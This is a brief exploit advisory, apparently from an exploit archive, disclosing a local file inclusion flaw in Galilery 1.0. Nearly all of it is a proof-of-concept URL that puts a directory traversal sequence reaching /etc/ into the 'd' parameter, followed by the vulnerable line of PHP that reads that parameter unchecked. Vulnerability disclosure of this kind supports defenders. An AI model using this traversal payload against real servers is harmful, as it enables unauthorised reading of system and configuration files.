Kod:
# exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve : 
#

 
PoC : 

http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/

cuz:
index.php: $d=$_GET['d'];